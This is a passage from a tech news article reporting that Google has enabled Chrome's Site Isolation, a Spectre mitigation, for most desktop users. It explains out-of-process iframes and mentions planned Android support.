Site Isolation as an optional (under the hood) feature after it was introduced with Chrome 63 in December 2017. It was enabled by default on desktops with the release of Chrome 67, at the end of May, as previously reported.

In its blog post, Google goes on to explain how the tech works, adding that it had been working on Site Isolation even before Spectre appeared in January.

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using “out-of-process iframes.”

Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre.

Site Isolation changes Chrome’s behaviour under the hood, but this “generally shouldn’t cause visible changes for most users or web developers,” according to Google. Although the vast majority (99 per cent) of Chrome users are being moved onto Site Isolation, Google is keeping a one in a 100 on a temporary holdback to “monitor and improve performance”.

With Site Isolation, a single page may now be split across multiple renderer processes using out-of-process iFrames.

Spectre patches have being known to impair performance in other contexts but it doesn’t seem that the Chocolate Factory anticipates issues. The long soft launch of the technology provided plenty of time to iron out any wrinkles, after all.

Google is investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Ahead of prime time, experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/chrome_site_isolation/